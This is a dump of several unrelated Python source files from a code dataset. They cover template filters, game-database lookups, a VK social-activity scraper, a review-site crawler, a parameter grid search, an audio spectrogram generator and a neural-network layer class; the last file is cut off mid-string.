userfilter4\n\nregister.filter(twtz)\nregister.filter(bbcode)\nregister.filter(strip_bbcode)\nregister.filter(smile_filter)\nregister.filter(bbcode_filter)\nregister.filter(mail_filter)\nregister.filter(mail_filter_table)\nregister.filter(fotofilterpc)\nregister.filter(fotofilterpc2)\nregister.filter(fotofilterm)\nregister.filter(fotofilterm2)\nregister.filter(userfilter)\nregister.filter(userfilter2)\nregister.filter(userfilter3)\nregister.filter(userfilter4)\n","sub_path":"templatefilters.py","file_name":"templatefilters.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"423679354","text":"from sys import argv\n\n#Looks up and returns a ship name from an ID\ndef shiplookup(argv):\n    import mysql.connector as mariadb\n    shiptype = argv\n    dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n    dbref = dbopen.cursor(buffered=True)\n    dbref.execute(\"select typeName from invTypes where typeID=%s\", (shiptype,))\n    shipname=dbref.fetchone()[0]\n    dbopen.close()\n    return shipname\n\n#Looks up and returns a solar system name from ID\ndef systemlookup(argv):\n    import mysql.connector as mariadb\n    solarid = argv\n    dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n    dbref = dbopen.cursor(buffered=True)\n    dbref.execute(\"select solarSystemName from mapSolarSystems where solarSystemID=%s\", (solarid,))\n    systemname=dbref.fetchone()[0]\n    dbopen.close()\n    return systemname\n\n#Looks up and returns the security level of a system from the ID\ndef systemseclookup(argv):\n    import mysql.connector as mariadb\n    solarid = argv\n    dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n    dbref = dbopen.cursor(buffered=True)\n    dbref.execute(\"select security from mapSolarSystems where solarSystemID=%s\", (solarid,))\n    systemsec=dbref.fetchone()[0]\n    dbopen.close()\n    return systemsec\n\n#Looks up and returns the region a system is in from a system ID\ndef regionlookup(argv):\n    import mysql.connector as mariadb\n    solarid = argv\n    dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n    dbref = dbopen.cursor(buffered=True)\n    dbref.execute(\"select regionID from mapSolarSystems where solarSystemID=%s\", (solarid,))\n    regionid=dbref.fetchone()[0]\n    dbref.execute(\"select regionName from mapRegions where regionID=%s\", (regionid,))\n    regionname=dbref.fetchone()[0]\n    
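#close the connection before returning the resolved region name\n    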
dbopen.close()\n    return regionname\n\n#Looks up character name from ID, first by seeing if it exists in the database, then ESI call to CCP servers\ndef characterlookup(argv):\n    import mysql.connector as mariadb\n    charid = argv\n    dbopen = mariadb.connect(user='', database='abyssal', charset='utf8')\n    dbref = dbopen.cursor(buffered=True)\n    dbref.execute(\"select charactername from kills where characterid=%s\", (charid,))\n    if (dbref.rowcount != 0):\n        charname=dbref.fetchone()[0]\n        dbopen.close()\n        return charname\n    if (dbref.rowcount == 0):\n        import json\n        import urllib2\n        charid = str(charid)\n        url = \"https://esi.evetech.net/latest/characters/\"+ charid +\"/?datasource=tranquility\"\n        response = urllib2.urlopen(url)\n        data = response.read()\n        chardata = json.loads(data)\n        charname = chardata['name']\n        dbopen.close()\n        return charname\n\ndef groupidlookup(argv):\n    import mysql.connector as mariadb\n    shiptype = argv\n    dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n    dbref = dbopen.cursor(buffered=True)\n    dbref.execute(\"select groupID from invTypes where typeID=%s\", (shiptype,))\n    groupid=dbref.fetchone()[0]\n    dbopen.close()\n    return groupid\n\n#Looks up system ID from zkill locationID\ndef locationidlookup(argv):\n    import mysql.connector as mariadb\n    locid = argv\n    dbopen = mariadb.connect(user='', database='evedata', charset='utf8')\n    dbref = dbopen.cursor(buffered=True)\n    dbref.execute(\"select solarSystemID from mapDenormalize where itemID=%s\", (locid,))\n    solarid=dbref.fetchone()[0]\n    return solarid\n","sub_path":"lookup.py","file_name":"lookup.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"4375363","text":"import vk\nimport time\nimport datetime\nimport json\nimport params\nimport threading\nimport math\nfrom queue import Queue\n\nsession = vk.Session(access_token= params.token_1)\napi = vk.API(session)\n\n\nclass soc_activity():\n\n    result = list()\n    list_instagrams = list()\n\n    def __init__(self):\n        pass\n\n#function that returns the list of ids of users who are members of the given community\n\n    def get_ids_from_community(self, id):\n        count_users = 0\n        end_circle = 0\n        list_ids = []\n\n        while(end_circle <= count_users):\n            get_user_com, offset = api.execute(code=params.for_ids_from_comm%(str(end_circle),str(id)))\n\n            end_circle = offset\n            count_users = get_user_com[0]['count']\n\n            for length in range(len(get_user_com)):\n                list_ids.append(get_user_com[length]['ids'])\n\n            
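#brief pause between execute() batches to respect the VK API rate limit\n            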
            time.sleep(0.3)\n\n        return list_ids\n\n\n    def count_need(self, list_with, string_target):\n        var_count = 0\n\n        for iter_list in list_with:\n            for iter_dict in iter_list[string_target]:\n                if iter_dict is not None:\n                    var_count = var_count + iter_dict\n\n        return var_count\n\n\n#function - checks whether this person is in the community we are interested in\n    def community_inspection(self, id, community):\n        get_user_com, offset = api.execute(code=params.for_getting_com%str(id))\n\n        list_id_and_names = list()\n        list_id = list()\n        list_names = list()\n\n        for dicts_in in get_user_com:\n            for ids in dicts_in['ids']:\n                list_id.append(ids)\n            for names in dicts_in['name']:\n                list_names.append(names)\n\n        for id_community in community:\n            for id_from_list in range(len(list_id)):\n                if int(list_id[id_from_list]) == int(id_community):\n                    dict_with_id_name = {}\n                    dict_with_id_name['id'] = list_id[id_from_list]\n                    dict_with_id_name['community_name'] = list_names[id_from_list]\n                    list_id_and_names.append(dict_with_id_name)\n\n        return list_id_and_names\n#finds the wall post with the date closest to the given date\n    def searching_date(self, get_wall, date):\n        min = int(date)\n        id_in_dict = 0\n        num_dict = 0\n\n        for dicts in range(len(get_wall)):\n            for values in range(len(get_wall[dicts]['dates'])):\n                if get_wall[dicts]['dates'][values] is not None:\n                    if (math.fabs(int(date) - int(get_wall[dicts]['dates'][values])) <= min):\n                        min = math.fabs(int(date) - int(get_wall[dicts]['dates'][values]))\n                        id_in_dict = values\n                        num_dict = dicts\n\n        offset = (num_dict + 1) * 100 + id_in_dict\n        return offset\n\n#checks the platforms the posts were made from\n    def check_platforms(self, get_wall):\n        plat = list()\n        print(len(get_wall))\n        if len(get_wall) != 0:\n\n            for i in get_wall[0]['platform']:\n                if i is not None:\n                    if (i['type'] and i['type'] not in plat):\n                        plat.append(i['type'])\n                    if 'platform' in i:\n                        if i['platform'] not in plat:\n                            plat.append(i['platform'])\n                        if i['platform'] == 'Instagram' or 'url' in i:\n                            self.list_instagrams.append(i['url'])\n        return plat\n\n\n    def get_friend_info(self, list_id, community_id, token, date):\n        print('hello')\n        session = vk.Session(access_token = token)\n        api = vk.API(session)\n\n\n        for lists in list_id:\n            for id in lists:\n                print(token)\n                get_info = api.users.get(user_ids=id, fields=\"photo_200\", v=5.53)\n\n                time.sleep(0.3)\n\n                if 'deactivated' in get_info[0]:\n                    continue\n                else:\n                    get_wall, offset = api.execute(code=params.getting_wall%str(id))\n\n                    offset = self.searching_date(get_wall, date)\n\n                    time.sleep(0.3)\n\n                    get_wall = api.execute(code=params.res_wall%(offset,str(id)))\n\n                    platforms = self.check_platforms(get_wall)\n\n                    time.sleep(0.3)\n\n                    count_like, count_repost = self.count_need(get_wall, 'likes'), self.count_need(get_wall, 'reposts')\n\n                    com_inspect = self.community_inspection(id, community_id)\n\n                    get_info[0]['community'] = com_inspect\n                    get_info[0]['likes'] = count_like\n                    get_info[0]['reposts'] = count_repost\n                    get_info[0]['post_count'] = offset\n                    get_info[0]['coefficient'] = int((count_repost+count_like)/offset)\n                    get_info[0]['platforms'] = platforms\n\n                    self.result.append(get_info[0])\n\n                    print(get_info)\n\n\n\n\n    def get_result(self,friends,communities,data):\n\n        try:\n            first_thread = threading.Thread(target=self.get_friend_info,\n                                args=(friends[: int(len(friends) * 1 / 3)], communities, params.token_1, data))\n            second_thread = threading.Thread(target=self.get_friend_info,\n                                args=(friends[int(len(friends) * 1 / 3): int(len(friends) * 2 / 3)], communities, params.token_2, data))\n            third_thread = threading.Thread(target=self.get_friend_info,\n                                args=(friends[int(len(friends) * 2 / 3):], communities, params.token_3, data))\n\n            first_thread.start()\n            second_thread.start()\n            third_thread.start()\n\n            first_thread.join()\n            second_thread.join()\n            third_thread.join()\n        except:\n            print(\"Error: unable to start thread\")\n        finally:\n            users = {'users': self.result}\n            users = json.dumps(users)\n\n            return users\n\n\n\nsoc_activ = soc_activity()\nids = soc_activ.get_ids_from_community(66766496)\ndate = datetime.date(2016,4,14)\ndate = time.mktime(date.timetuple())\nsoc_activ.get_result(ids,[20629724, 98006063], date)\n\n\n\n\n\n","sub_path":"activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"423269670","text":"#prerna\n#reviewed by ashish\nimport re\nimport copy\nimport logging\nfrom urllib2 import urlparse\nfrom datetime import datetime, timedelta\n\nfrom tgimport import tg\nfrom baseconnector import BaseConnector\nfrom utils.utils import stripHtml, get_hash\nfrom utils.decorators import logit\nfrom utils.sessioninfomanager import checkSessionInfo, updateSessionInfo\n\nlog = logging.getLogger('GameTrailersConnector')\nclass GameTrailersConnector(BaseConnector):\n    \n    @logit(log , 'fetch')\n    def fetch(self):\n        '''This is a fetch method which fetches the data \n        sample url: http://www.gametrailers.com/video/review-medal-of/25655\n        '''\n        try:\n            self.genre = \"Review\"\n            self.baseuri = 'http://www.gametrailers.com/ajax/player_comments_ajaxfuncs_read.php?do=get_list_page&type=movies&id=25655&page=1&count=10'\n            #params = dict(type='movies',id=1000,page=100)\n            #self.baseuri%params\n            self.__task_elements_dict = {\n                'priority':self.task.priority,\n                'level': self.task.level,\n                'last_updated_time':datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\"),\n                'pickup_date':datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\"),\n                'connector_instance_log_id': self.task.connector_instance_log_id,\n                'connector_instance_id':self.task.connector_instance_id,\n                'workspace_id':self.task.workspace_id,\n                'client_id':self.task.client_id,\n                'client_name':self.task.client_name,\n                'versioned':False,\n                'category':self.task.instance_data.get('category',''),\n                'task_log_id':self.task.id }\n            self.__setSoupForCurrentUri()\n            self.__setParentPage()\n            posts_url_id = 'movies&id=' + self.currenturi.split('/')[-1]\n            self.currenturi = re.sub('movies&id=\\\d+',posts_url_id,self.baseuri) \n            self.__setSoupForCurrentUri()\n            try:\n                page_tag = int(stripHtml(self.soup.find('div','comment_head_text_right').\\\n                    findAll('a')[-2].renderContents()))\n                log.debug(self.log_msg(page_tag))\n            except:\n                log.exception(self.log_msg('page_tag not found %s'%self.currenturi))\n            count = 1\n            while self.__iteratePosts():\n                count += 1\n                next_page = 'page=' + str(count)\n                self.currenturi = re.sub('&page=\\\d+&','&' + next_page + '&' ,self.currenturi)\n                if count > page_tag: #for pagination\n                    break\n                self.__setSoupForCurrentUri()\n        except:\n            log.exception(self.log_msg('Exception while adding the thread posts \\\n                for the url %s'%self.currenturi))\n        return True\n\n    @logit(log, '__setParentPage')\n    def __setParentPage(self):\n        \"\"\" this will set parent page info \"\"\"\n        page = {}\n        try:\n            page['title'] = stripHtml(self.soup.find('h2','gameTitle').renderContents()) \n        except:\n            log.exception(self.log_msg('main page title not found %s'%self.currenturi))\n            page['title'] = 
''\n try:\n page['data'] = stripHtml(self.soup.find('div','description').renderContents())\n except:\n log.exception(self.log_msg('data not found %s'%self.currenturi)) \n page['data'] = '' \n \n if not page['title'] and not page['data']:\n log.info(self.log_msg(\"Data and title not found for %s,\"\\\n \" discarding this review\"%self.currenturi))\n return False \n try:\n date_str = stripHtml(self.soup.find('span', 'posted').renderContents()).\\\n split(':')[-1].strip()\n page['posted_date'] = datetime.strptime(date_str,'%b %d, %Y').strftime(\\\n \"%Y-%m-%dT%H:%M:%SZ\") #another way of python calling convention\n except:\n log.exception(self.log_msg('Posted date not found %s'%self.currenturi))\n page['posted_date'] = datetime.strftime(datetime.utcnow(), \\\n \"%Y-%m-%dT%H:%M:%SZ\")\n try:\n page['ei_data_views_count'] = int(stripHtml(self.soup.find('span', 'views').\\\n renderContents()).split(':')[-1].strip().\\\n replace(',',''))\n except:\n log.exception(self.log_msg('views count not found %s'%self.currenturi)) \n try:\n field = self.soup.find('div', 'content').findAll('strong')\n for each in field:\n tag = 'et_game_' + stripHtml(each.renderContents()).replace(':','').\\\n lower().replace(' ','_')\n if 'platforms' in tag:\n page[tag] = stripHtml(each.findParent('div').renderContents()).\\\n split(':')[-1].strip()\n elif 'release' in tag:\n tag = tag.replace('et','edate')\n date_str = stripHtml(each.next.next.__str__()).strip()\n page[tag] = datetime.strftime(datetime.strptime(date_str,'%b %d, %Y'),\\\n \"%Y-%m-%dT%H:%M:%SZ\")\n else:\n page[tag] = stripHtml(each.next.next.__str__()) \n except:\n log.exception(self.log_msg('game info not found %s'%self.currenturi))\n \n unique_key = self.currenturi\n if checkSessionInfo('review', self.session_info_out, unique_key,\\\n self.task.instance_data.get('update')):\n \n log.info(self.log_msg('Session info returns True for uri %s'\\\n %self.currenturi))\n return False\n try:\n result=updateSessionInfo('review', self.session_info_out, unique_key, \\\n get_hash( page ),'Review', self.task.instance_data.get('update'))\n if not result['updated']:\n log.exception(self.log_msg('Update session info returns False %s'%self.currenturi))\n return True\n page['parent_path'] = [] #parent path empty..recheck why not product page!!\n page['path'] = [self.task.instance_data['uri']]\n page['uri'] = self.currenturi\n page['entity'] = 'Review'\n page['uri_domain'] = urlparse.urlparse(page['uri'])[1]\n page.update(self.__task_elements_dict)\n self.pages.append(page)\n #log.info(page)\n log.info(self.log_msg('Post Added %s'%self.currenturi))\n return True \n except:\n log.exception(self.log_msg('Error while adding session info %s'%self.currenturi))\n return False \n\n @logit(log, '__iteratePosts')\n def __iteratePosts(self): \n try:\n posts = self.soup.findAll('div','comment_text_container')\n if not posts:\n log.info(self.log_msg('No posts found %s'%self.currenturi))\n return False\n log.debug(self.log_msg('Total No of Posts found is %d'%len(posts)))\n for post in posts[:]:#use some range for few data \n if not self.__addPost(post):\n return False \n return True \n except:\n log.exception(self.log_msg('can not find the data %s'%self.currenturi))\n return False \n \n @logit(log, '__addPost') \n def __addPost(self, post): \n \"\"\"\n This will take the post tag , and fetch data and meta data and add it to \n self.pages\n \"\"\"\n try:\n page = self.__getData(post)\n if not page:\n return True \n unique_key = get_hash({'posted_date' : page['posted_date'], 'data': 
page['data']}) \n if checkSessionInfo(self.genre, self.session_info_out, unique_key,\\\n self.task.instance_data.get('update'),parent_list\\\n = [self.task.instance_data['uri']]):\n log.info(self.log_msg('Session info returns True'))\n return False\n except:\n log.exception(self.log_msg('Cannot add the post for the url %s'%\\\n self.currenturi))\n return False\n try:\n result=updateSessionInfo(self.genre, self.session_info_out, unique_key, \\\n get_hash( page ),'review', self.task.instance_data.get('update'),\\\n parent_list=[self.task.instance_data['uri']])\n if not result['updated']:\n log.exception(self.log_msg('Update session info returns False'))\n return True\n page['parent_path'] = [self.task.instance_data['uri']]\n page['path'] = [self.task.instance_data['uri'],unique_key]\n page['uri'] = self.currenturi\n page['entity'] = 'review'\n page['uri_domain'] = urlparse.urlparse(page['uri'])[1]\n page.update(self.__task_elements_dict)\n self.pages.append(page)\n #log.info(page)\n log.info(self.log_msg('page added %s'%self.currenturi))\n return True\n except:\n log.exception(self.log_msg('Error while adding session info'))\n return False \n \n @logit(log, '__getData')\n def __getData(self, post):\n page = {}\n try:\n data_tag = post.find('div', 'comment_text')\n quote_tag = data_tag.find('div', 'quoted_msg')\n if quote_tag:\n quote_tag.extract()\n page['title'] = page['data'] = stripHtml(data_tag.renderContents()).\\\n replace('/>>','/>')\n except:\n log.exception(self.log_msg('Data not found for the url %s'%self.currenturi))\n page['title'] = page['data'] = '' \n \n if not page['title'] and not page['data']: \n log.info(self.log_msg(\"Data and title not found for %s,\"\\\n \" discarding this review\"%self.currenturi))\n return False \n try:\n date_str = stripHtml(post.find('div','comment_date').renderContents()).\\\n split('Posted')[-1].strip()\n page['posted_date']= datetime.strftime(datetime.strptime(date_str,'%m-%d-%Y %I:%M%p'),\\\n \"%Y-%m-%dT%H:%M:%SZ\") \n except:\n log.exception(self.log_msg('posted_date nt found %s'%self.currenturi))\n page['posted_date'] = datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\") \n \n # author info \n try:\n page['et_author_name'] = stripHtml(post.find('div','comment_username').\\\n renderContents())\n except:\n log.exception(self.log_msg('author_name not found %s'%self.currenturi))\n \n copycurrenturi = self.currenturi\n try:\n auth_link = post.find('div','comment_username').find('a')['href']\n self.currenturi = auth_link\n self.__setSoupForCurrentUri() \n try:\n page['et_author_level'] = stripHtml(self.soup.find('div','gamepad_leftnav_level').\\\n renderContents()).split('Level')[-1]\n except:\n log.exception(self.log_msg('author level not found %s'%self.currenturi)) \n try: \n auth_info = stripHtml(self.soup.find('div','info_box_text').\\\n renderContents()).split('\\n') \n for each in auth_info: \n if 'Join' in each:\n try:\n date_str = stripHtml(each.__str__()).\\\n split(':')[-1].strip()\n page['edate_author_join_date'] = datetime.\\\n strftime(datetime.strptime(date_str,'%b %d, %Y'),\\\n \"%Y-%m-%dT%H:%M:%SZ\") \n except:\n log.exception(self.log_msg('Join date not found %s'%self.currenturi))\n elif 'Experience' in each:\n page['ei_author_experience'] = int(stripHtml(each.__str__()).\\\n split(':')[-1].replace(',',''))\n elif 'GTP' in each:\n page['ei_author_gtp'] = int(stripHtml(each.__str__()).\\\n split(':')[-1].replace(',','')) \n elif 'Last' in each:\n date = stripHtml(each.__str__()).split(':')[-1].strip() \n date_exp = 
re.search(re.compile(r'([0-9]*) (hour|hours|minute|mins|minutes|day|days|month|months) ago'),date)\n if date_exp:\n if date_exp.group(2) in ['day','days']:\n page['edate_author_last_online'] = datetime.\\\n strftime(datetime.utcnow()-\\\n timedelta(days=int(date_exp.group(1))),\"%Y-%m-%dT%H:%M:%SZ\")\n elif date_exp.group(2) in ['hour','hours']:\n page['edate_author_last_online'] = datetime.\\\n strftime(datetime.utcnow()-timedelta(seconds=3600*int(date_exp.group(1))),\"%Y-%m-%dT%H:%M:%SZ\")\n elif date_exp.group(2) in '[minute,mins,minutes]':\n page['edate_author_last_online'] = datetime.\\\n strftime(datetime.utcnow()-timedelta(seconds=60*int(date_exp.group(1))),\"%Y-%m-%dT%H:%M:%SZ\")\n elif date_exp.group(2) in '[month,months]':\n page['edate_author_last_online'] = datetime.\\\n strftime(datetime.utcnow()-timedelta(days=30*int(date_exp.group(1))),\"%Y-%m-%dT%H:%M:%SZ\")\n \n except:\n log.exception(self.log_msg('auth_info not found %s'%self.currenturi))\n try:\n rating_info = stripHtml(self.soup.find('div','info_box_middle').\\\n find('div','info_box_title',text = re.compile('Thumb Ratings')).\\\n findNext('div').renderContents()).split('\\n')\n for each in rating_info:\n if 'Total' in each:\n try:\n page['ei_author_total_ratings_score'] = int(stripHtml(each.__str__()).\\\n split(':')[-1].replace(',',''))\n except:\n log.exception(self.log_msg('auth total score not found %s'%self.currenturi)) \n elif '+' in each:\n try:\n page['ei_author_total_positive_thumbs_given'] =\\\n int(stripHtml(each.__str__()).split(':')[-1].\\\n replace(',','').replace('-',''))\n except:\n log.exception(self.log_msg('positive thumbs no not found %s'%self.currenturi)) \n elif '-' in each:\n try:\n page['ei_author_total_negative_thumbs_given'] =\\\n int(stripHtml(each.__str__()).split(':')[-1].replace(',','').replace('-','')) \n except:\n log.exception(self.log_msg('negative thumbs not found %s'%self.currenturi)) \n \n except:\n log.exception(self.log_msg('rating info not found %s'%self.currenturi)) \n except:\n log.exception(self.log_msg('author link not found %s'%self.currenturi))\n self.currenturi = copycurrenturi \n return page \n \n \n @logit(log, '__setSoupForCurrentUri') \n def __setSoupForCurrentUri(self, data=None, headers={}):\n \"\"\"It will set soup object for the Current URI\n \"\"\"\n res = self._getHTML(data=data, headers=headers)\n if res:\n self.rawpage = res['result']\n else:\n log.info(self.log_msg('Page Content cannot be fetched for the url: \\\n %s'%self.currenturi))\n raise Exception('Page content not fetched for th url %s'%self.currenturi)\n self._setCurrentPage() \n \n \n \n \n \n \n ","sub_path":"crawler/connectors/gametrailersconnector.py","file_name":"gametrailersconnector.py","file_ext":"py","file_size_in_byte":17639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"307941858","text":"#!/home/asal/anaconda3/bin/python\n\n\nimport os\nimport matplotlib.pyplot as plt\n\n\nsteps_ahead = 24\neps_start = 0.001\neps_end = 1.0\neps_step = 0.001\n\n\ndef main():\n\teps = eps_start\n\tepss = []\n\tmean_rmses = []\n\tmin_mean_rmse = 1000000.0\n\tmin_eps = eps\n\twhile eps <= eps_end:\n\t\tcmd = './ASLR_icc_release.out 3 3 1 1 0 '\n\t\tcmd += str(round(eps, 2))\n\t\tcmd += ' '\n\t\tcmd += str(1)\n\t\tcmd += ' '\n\t\tcmd += str(2)\n\t\tcmd += ' '\n\t\tcmd += str('0.001')\n\t\tcmd += ' '\n\t\tcmd += str('0.001')\n\t\tcmd += ' '\n\t\tcmd += str(0)\n\t\tcmd += ' '\n\t\tcmd += str('0.001')\n\t\tcmd += ' '\n\t\tcmd += str('1000')\n\t\tcmd += ' 
'\n\t\tcmd += str(steps_ahead)\n\t\tcmd += ' 1'\t# number of threads\n\t\tresult = os.popen(cmd).read()\n\t\tresult = result.split(' ')\n\t\tepss.append(float(result[0]))\n\t\tmean_rmses.append(float(result[1]))\n\t\tif float(result[1]) < min_mean_rmse:\n\t\t\tmin_mean_rmse = float(result[1])\n\t\t\tmin_eps = eps\n\t\tprint(result[0], result[1])\n\t\teps += eps_step\n\tplt.plot(epss, mean_rmses)\n\tplt.show()\n\tprint(min_eps, min_mean_rmse)\n\n\nif __name__ == '__main__':\n main()","sub_path":"src/grid_search_ASLR.py","file_name":"grid_search_ASLR.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"32072662","text":"from urllib.request import urlopen\nfrom urllib.error import HTTPError,URLError\nfrom bs4 import BeautifulSoup\n\ndef getData(url, uit = '', uic = ''):\n\n\ttry:\n\t\thtml = urlopen(url)\n\texcept HTTPError as e:\n\t\tprint (\"http error\")\n\t\tprint (e)\n\t\treturn None\n\texcept URLError as e:\n\t\tprint(\"URL error\")\n\t\tprint(e)\n\t\treturn None\n\n\n\ttry:\n\t\tbsObj = BeautifulSoup(html.read(), features=\"html.parser\")\n\t\t#logic goes here\n\t\tprint (uit)\n\t\tprint (uic)\n\texcept AttributeError as e:\n\t\tprint(\"attribute error\")\n\t\tprint(e)\n\t\treturn None\n\treturn bsObj.findAll(uit, {\"class\": uic})\n\t# return bsObj.findAll(text = \"the prince\")\n\n\n\nuInpTag = input(\"please type the html tag name: \")\nuInpClass = input(\"please type the class(green/red) name: \")\n\nurl = \"http://www.pythonscraping.com/pages/warandpeace.html\"\n\ndata = getData(url, uInpTag, uInpClass)\n\nfor name in data:\n\tprint(name.getText())","sub_path":"scrapper/chapter2/advanceparse.py","file_name":"advanceparse.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"233197914","text":"\"\"\"\nMIT License\nCopyright (c) 2016 Francesco Gadaleta\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to do\nso, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport matplotlib\n# Force matplotlib to not use any Xwindows backend.\nmatplotlib.use('Agg')\n\nfrom os import path, listdir, mkdir\nimport utils as ut\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Create data for ahem detector\")\n\nparser.add_argument(\"data_dir\", action=\"store\")\n\nconfig = parser.parse_args()\nprint(\"Creating samples from: {}\".format(config.data_dir))\n\nif not path.isdir(config.data_dir):\n\traise Exception(\"First Argument is not a directory\")\n\n# Load sound files\nsound_files = [path.join(config.data_dir, f)\n\t\t\t\tfor f in listdir(config.data_dir)\n\t\t\t\tif f.endswith(\"wav\")]\n\nif len(sound_files) == 0:\n\traise Exception(\"There are no wav files in path: {}\".format(config.data_dir))\n\nraw_sounds = ut.load_sound_files(sound_files)\n\nimage_path = path.join(config.data_dir, \"images\")\nif not path.isdir(image_path):\n\tmkdir(image_path)\n\nwindowsize = 6000 # size of sliding window (22050 samples == 0.5 sec)\nstep = 3000\nnumfiles = 0\n\ndimx = 6\ndimy = 5\n\nfor i in range(len(raw_sounds)):\n\t# create samples\n\tnumsamples = raw_sounds[i].shape[0]\n\tfile_path = path.basename(sound_files[i])\n\tfile_path = path.splitext(file_path)[0]\n\tfor x in range(0, numsamples - windowsize, step):\n\t\tb = x # begin\n\t\te = x + windowsize # end\n\n\t\tfmt_string = \"(%d/%d) %s [%d-%d] of %d file %d\"\n\t\tut.printStuff(fmt_string, (i, len(raw_sounds) - 1, file_path, x, e, numsamples, numfiles))\n\n\t\tfilename = path.join(image_path, \"{}_{}.png\".format(file_path, x))\n\t\tut.specgram_frombuffer(raw_sounds[i][x:e], dimx, dimy, fname=filename, dpi=180)\n\n\t\tnumfiles += 1\n\nprint('\\nbye!\\n')\n","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"489142598","text":"'''\n Problem Statement : Going to Office\n Link : https://www.hackerearth.com/practice/basic-programming/operators/basics-of-operators/practice-problems/algorithm/going-to-office-e2ef3feb/description/\n score : 5\n'''\n\nD = int(input())\nO = list(map(int,input().split(\" \")))\nC = list(map(int,input().split(\" \")))\nOc = O[0]\nOf = O[1]\nOd = O[2]\nCs = C[0]\nCb = C[1]\nCm = C[2]\nCd = C[3]\n\nonline = int(Oc + (D-Of)*Od)\noffline = int(Cb + (D/Cs)*Cm + D*Cd)\n\nif online str:\n \"\"\"Removes the unit_ prefix from a unit attribute.\n\n For example, `_parse_unit_attr(\"unit_act\")` will return `\"act\"`.\n\n Args:\n attr: The attribute to parse.\n\n Returns:\n `attr`, but with the `\"unit_\"` prefix removed.\n\n Raises:\n ValueError: If `attr` cannot be parsed.\n\n \"\"\"\n parts = attr.split('_', maxsplit=1)\n valid_attr = len(parts) == 2 and parts[0] == \"unit\"\n if not valid_attr:\n raise ValueError(\"{0} is not a valid unit attribute.\".format(attr))\n return parts[1]\n\n\nclass Layer(log.ObservableMixin):\n \"\"\"A layer of units (neurons).\n\n Args:\n name: The name of the layer.\n size: The number of units in the layer.\n spec: The layer specification. 
If it is `None`, the default spec will\n be used.\n\n \"\"\"\n\n def __init__(self, name: str, size: int,\n spec: specs.LayerSpec = None) -> None:\n self.size = size\n\n if spec is None:\n self.spec = specs.LayerSpec()\n else:\n self.spec = spec\n\n self.units = [unit.Unit(self.spec.unit_spec) for _ in range(size)]\n\n self.fbi = 0.0\n super().__init__(name)\n\n def avg_act(self) -> float:\n \"\"\"Returns the average activation of the layer's units.\"\"\"\n return statistics.mean(unit.act for unit in self.units)\n\n def avg_net(self) -> float:\n \"\"\"Returns the average net input of the layer's units.\"\"\"\n return statistics.mean(unit.net for unit in self.units)\n\n def update_net(self) -> None:\n \"\"\"Updates the net input of the layer's units.\"\"\"\n for i in self.units:\n i.update_net()\n\n def update_inhibition(self) -> None:\n \"\"\"Updates the inhibition of the layer's units.\"\"\"\n # Compute feedforward inhibition\n ffi = self.spec.ff * max(self.avg_net() - self.spec.ff0, 0)\n # Compute feedback inhibition\n self.fbi = self.spec.fb_dt * (self.spec.fb * self.avg_act() - self.fbi)\n # Compute global inhibition\n gc_i = self.spec.gi * (ffi * self.fbi)\n\n for i in self.units:\n i.update_inhibition(gc_i)\n\n def update_membrane_potential(self) -> None:\n \"\"\"Updates the membrane potential of the layer's units.\"\"\"\n for i in self.units:\n i.update_membrane_potential()\n\n def update_activation(self) -> None:\n \"\"\"Updates the activation of the layer's units.\"\"\"\n for i in self.units:\n i.update_activation()\n\n def activation_cycle(self) -> None:\n \"\"\"Runs one complete activation cycle of the layer.\"\"\"\n self.update_net()\n self.update_inhibition()\n self.update_membrane_potential()\n self.update_activation()\n\n def observe(self, attr: str) -> log.ObjObs:\n \"\"\"Overrides `log.ObservableMixin.observe`.\"\"\"\n try:\n parsed = _parse_unit_attr(attr)\n return [(\"unit{0}_{1}\".format(i, parsed),\n unit.observe(parsed)[0][1])\n for i, unit in enumerate(self.units)]\n except ValueError:\n pass\n\n if attr == \"avg_act\":\n return [(\"avg_act\", self.avg_act())]\n elif attr == \"avg_net\":\n return [(\"avg_net\", self.avg_net())]\n else:\n raise ValueError(\n \"{0} is not a valid layer 